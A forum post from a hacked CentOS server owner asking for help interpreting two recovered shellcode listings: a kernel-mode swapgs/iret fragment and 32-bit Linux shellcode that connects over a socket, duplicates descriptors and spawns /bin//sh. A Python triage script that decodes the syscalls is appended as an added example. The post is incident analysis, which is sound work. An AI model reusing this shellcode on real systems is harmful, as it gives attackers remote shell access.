Seeking help from assembly and security gurus. My Linux box was hacked!

    Nov 4, 2013
    Hello friends,

    I run a personal web server that recently suffered an unfortunate break-in / hacking attempt. The server that was broken into is running CentOS 6.3 (old, yes, I know).

    I have already taken the server offline to limit further damage and penetration of my home network.

    Recently, while attempting to do a post-mortem analysis of the attacks that were used, I found some shell code.

    Please forgive me, I am ignorant of most technical code (also, my English is still very bad). My work friend helped me to decrypt these shell codes. He says they are assembly, but I know very little about assembly language programming, so I came here to ask you whether these programs look bad to you.

    Can some assembly guru here please tell me what these codes were used to do to my web server? I am pretty sure they broke into the root account, and I have unplugged this machine so no more damage can be done.

    But I would still like to know HOW they did it, and what the assembly programs exploited, so that I can better protect my server in the future.

    Thank you all very much!!

    Assembly codes below.

    program 1:
    .data:0x00000000 0f01f8 swapgs
    .data:0x00000003 e805000000 call func_0000000d
    .data:0x00000008 0f01f8 swapgs
    .data:0x0000000b 48 dec eax
    .data:0x0000000c cf iret

    program 2:
    .data:0x00000000 31c0 xor eax,eax
    .data:0x00000002 31db xor ebx,ebx
    .data:0x00000004 31c9 xor ecx,ecx
    .data:0x00000006 31d2 xor edx,edx
    .data:0x00000008 b066 mov al,0x66
    .data:0x0000000a b301 mov bl,0x1
    .data:0x0000000c 51 push ecx
    .data:0x0000000d 6a06 push 0x6
    ; char* dst = arg[0]
    .data:0x0000000f 6a01 push 0x1
    .data:0x00000011 6a02 push 0x2
    .data:0x00000013 89e1 mov ecx,esp
    .data:0x00000015 cd80 int 0x80
    .data:0x00000017 89c6 mov esi,eax
    .data:0x00000019 b066 mov al,0x66
    .data:0x0000001b 31db xor ebx,ebx
    ; while (c != 0)
    .data:0x0000001d b302 mov bl,0x2
    .data:0x0000001f 6866686653 push 0x53666866
    .data:0x00000024 fec3 inc bl
    .data:0x00000026 89e1 mov ecx,esp
    .data:0x00000028 6a10 push 0x10
    .data:0x0000002a 51 push ecx
    .data:0x0000002b 56 push esi
    .data:0x0000002c 89e1 mov ecx,esp
    .data:0x0000002e cd80 int 0x80
    .data:0x00000030 31c9 xor ecx,ecx
    .data:0x00000032 b103 mov cl,0x3
    .data:0x00000034 loc_00000034:
    ┏▶ .data:0x00000034 fec9 dec cl
    ┃ .data:0x00000036 b03f mov al,0x3f
    ┃ .data:0x00000038 cd80 int 0x80
    ┗ .data:0x0000003a 75f8 jne loc_00000034
    .data:0x0000003c 31c0 xor eax,eax
    .data:0x0000003e 52 push edx
    .data:0x0000003f 686e2f7368 push 0x68732f6e
    .data:0x00000044 682f2f6269 push 0x69622f2f
    .data:0x00000049 89e3 mov ebx,esp
    .data:0x0000004b 52 push edx
    .data:0x0000004c 53 push ebx
    .data:0x0000004d 89e1 mov ecx,esp
    .data:0x0000004f 52 push edx
    .data:0x00000050 89e2 mov edx,esp
    .data:0x00000052 b00b mov al,0xb
    .data:0x00000054 cd80 int 0x80

    Thank you all and well wishes!
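A static triage of the "program 2" listing, added here as an example and not part of the original post: it tracks the immediates loaded into `al` and `bl` before each `int 0x80`, maps them to 32-bit Linux syscall and `socketcall` sub-call names, and joins consecutive `push imm32` operands into the string they build on the stack. The `triage` function and the `LISTING` excerpt (only the lines the tracker needs, copied from the post) are assumptions of this example.

```python
import re

# i386 Linux syscall numbers seen in the listing, and socketcall(2) sub-calls
SYSCALLS = {0x0B: "execve", 0x3F: "dup2", 0x66: "socketcall"}
SOCKETCALL = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}
INSN = re.compile(r"\.data:0x([0-9a-f]+) ([0-9a-f]+) (\w+) ?(.*)")
# Excerpt of "program 2" as posted (constructed subset, lines unchanged)
LISTING = """\
.data:0x00000008 b066 mov al,0x66
.data:0x0000000a b301 mov bl,0x1
.data:0x00000015 cd80 int 0x80
.data:0x00000019 b066 mov al,0x66
.data:0x0000001d b302 mov bl,0x2
.data:0x00000024 fec3 inc bl
.data:0x0000002e cd80 int 0x80
┃ .data:0x00000036 b03f mov al,0x3f
┃ .data:0x00000038 cd80 int 0x80
.data:0x0000003f 686e2f7368 push 0x68732f6e
.data:0x00000044 682f2f6269 push 0x69622f2f
.data:0x00000052 b00b mov al,0xb
.data:0x00000054 cd80 int 0x80
"""

def triage(listing):
    """Return ([(addr, syscall name)], [stack strings]) for a 32-bit listing."""
    reg, calls, strings, run = {"al": None, "bl": None}, [], [], []
    for line in listing.splitlines():
        m = INSN.search(line)
        if not m:
            continue  # labels, disassembler comments, blank lines
        addr, raw, op, args = int(m[1], 16), bytes.fromhex(m[2]), m[3], m[4]
        if op == "push" and raw[0] == 0x68 and len(raw) == 5:
            run.append(raw[1:].decode("ascii", "replace"))  # imm32, memory order
            continue
        if run:  # stack grows down: the last push sits at the lowest address
            strings.append("".join(reversed(run)))
            run = []
        dst, _, src = args.partition(",")
        if op == "mov" and dst in reg and src.startswith("0x"):
            reg[dst] = int(src, 16)
        elif op == "inc" and dst in reg and reg[dst] is not None:
            reg[dst] += 1
        elif op == "int" and args == "0x80":
            name = SYSCALLS.get(reg["al"], f"syscall {reg['al']}")
            if name == "socketcall":
                name += "/" + SOCKETCALL.get(reg["bl"], "?")
            calls.append((addr, name))
            reg["al"] = None  # eax now holds the syscall's return value
    return calls, strings
```
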
